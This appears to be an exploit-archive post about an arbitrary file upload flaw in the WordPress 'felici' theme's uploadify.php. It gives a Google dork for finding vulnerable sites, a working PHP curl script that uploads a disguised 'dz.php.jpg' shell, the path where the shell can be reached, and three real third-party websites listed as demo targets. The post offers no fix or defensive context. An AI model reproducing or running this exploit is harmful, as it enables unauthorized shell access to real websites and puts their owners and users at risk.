facebook facebook twitter rss

Wordpress Themes- felici Arbitrary File Upload Vulnerability

Author: Zikou-16 , Published: 30-11-2012
 -------------------------------------------------------------------------------
Wordpress Themes- felici Arbitrary File Upload Vulnerability
--------------------------------------------------------------------------------

######################################################################################
#
# Author => Zikou-16
#
# Facebook => http://fb.me/Zikou.se
#
# Google Dork => inurl:"wp-content/themes/felici"
#
#######################################################################################

---------------------------------------------------------------------------------------

Exploit : uploadshell.php.jpg or .gif

<?php

$uploadfile
="dz.php.jpg";

$ch curl_init("http://www.localhost/wp-content/themes/felici/sprites/js/uploadify/uploadify.php");
curl_setopt($chCURLOPT_POSTtrue);
curl_setopt($chCURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($chCURLOPT_RETURNTRANSFER1);
$postResult curl_exec($ch);
curl_close($ch);
print 
"$postResult";

?>


Shell Access : http://www.localhost/wp-content/themes/felici/sprites/js/cufon-fonts/uploaded/custom_dz.php.jpg

<?php
phpinfo
();
?>


---------------------------------------------------------------------------------------

Demo :

1) http://www.mostakbali.net/wp-content/themes/felici/sprites/js/uploadify/uploadify.php

2) http://www.edufin.com.br/wp-content/themes/felici/sprites/js/uploadify/uploadify.php

3) http://www.readermagazine.net/wp-content/themes/felici/sprites/js/uploadify/uploadify.php

-----------------------------------------------------------------------------------------

Like us on Facebook :